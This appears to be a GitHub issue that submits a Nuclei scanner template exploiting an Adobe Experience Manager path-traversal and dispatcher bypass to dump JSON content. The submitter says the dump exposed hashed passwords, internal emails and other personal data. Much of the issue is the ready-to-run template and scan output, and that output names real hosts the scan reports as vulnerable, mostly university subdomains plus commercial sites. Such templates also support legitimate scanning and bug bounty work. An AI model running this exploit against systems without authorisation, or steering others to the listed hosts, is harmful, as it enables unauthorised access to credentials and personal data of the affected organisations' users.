### ISSUE TITLE
[nuclei-template] aem-secrets

### ISSUE THREAD

**Issue by themoonbaba** [projectdiscovery/nuclei-templates#7277]
### Template Information:

My AEM secrets template which helped in getting $$$s bounties on a program.
The secrets which were exposed included hashed passwords of the users, internal email ids, Email inbox, other PII etc.

https://www.linkedin.com/feed/update/urn:li:activity:7066003031271616513/

### Nuclei Template:

```yaml
id: aem-secrets

info:
  name: aem-secrets-1
  author: boobooHQ
  severity: high
  description: Possible Juicy Files can be discovered at this endpoint. Search / Grep for secrets like hashed passwords ( SHA ) , internal email disclosure etc . 

  tags: aem,adobe,hackerone

requests:
  - method: GET
    path:
      - "{{BaseURL}}//content/dam/formsanddocuments.form.validator.html/home/....children.tidy...infinity..json"
      - "{{BaseURL}}/..;//content/dam/formsanddocuments.form.validator.html/home/....children.tidy...infinity..json"

    headers:
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
      Accept-Language: en-US,en;q=0.9,hi;q=0.8

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "jcr:uuid"
        part: body
        condition: and

      - type: status
        status:
          - 200
```

```console
root@localhost:~/AEM# nuclei -l httparchive_adobe_experience_manager_2020_11_18.txt -t ~/babu/aemboo.yaml 

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v2.9.4

                projectdiscovery.io

[WRN] Found 1 templates loaded with deprecated protocol syntax, update before v2.9.5 for continued support.
[INF] Current nuclei version: v2.9.4 (latest)
[INF] Current nuclei-templates version: 9.5.0 (latest)
[INF] New templates added in latest release: 20
[INF] Templates loaded for current scan: 1
[INF] Targets loaded for current scan: 15896
[aem-secrets] [http] [high] http://org-www.lottehotel.com//content/dam/formsanddocuments.form.validator.html/home/....children.tidy...infinity..json
[aem-secrets] [http] [high] https://acis.pamplin.vt.edu//content/dam/formsanddocuments.form.validator.html/home/....children.tidy...infinity..json
[aem-secrets] [http] [high] https://aaec.vt.edu//content/dam/formsanddocuments.form.validator.html/home/....children.tidy...infinity..json
[aem-secrets] [http] [high] https://advising.vt.edu//content/dam/formsanddocuments.form.validator.html/home/....children.tidy...infinity..json
[aem-secrets] [http] [high] https://aie.vt.edu//content/dam/formsanddocuments.form.validator.html/home/....children.tidy...infinity..json
[aem-secrets] [http] [high] https://artscenter.vt.edu//content/dam/formsanddocuments.form.validator.html/home/....children.tidy...infinity..json
[aem-secrets] [http] [high] https://beam.vt.edu//content/dam/formsanddocuments.form.validator.html/home/....children.tidy...infinity..json
[aem-secrets] [http] [high] https://bit.vt.edu//content/dam/formsanddocuments.form.validator.html/home/....children.tidy...infinity..json
[aem-secrets] [http] [high] https://brand.vt.edu//content/dam/formsanddocuments.form.validator.html/home/....children.tidy...infinity..json
[aem-secrets] [http] [high] https://campuslife.vt.edu//content/dam/formsanddocuments.form.validator.html/home/....children.tidy...infinity..json
[aem-secrets] [http] [high] https://career.vt.edu//content/dam/formsanddocuments.form.validator.html/home/....children.tidy...infinity..json
[aem-secrets] [http] [high] https://china.nuskin.com//content/dam/formsanddocuments.form.validator.html/home/....children.tidy...infinity..json
[aem-secrets] [http] [high] https://ccc.vt.edu//content/dam/formsanddocuments.form.validator.html/home/....children.tidy...infinity..json
[aem-secrets] [http] [high] https://che.vt.edu//content/dam/formsanddocuments.form.validator.html/home/....children.tidy...infinity..json

```
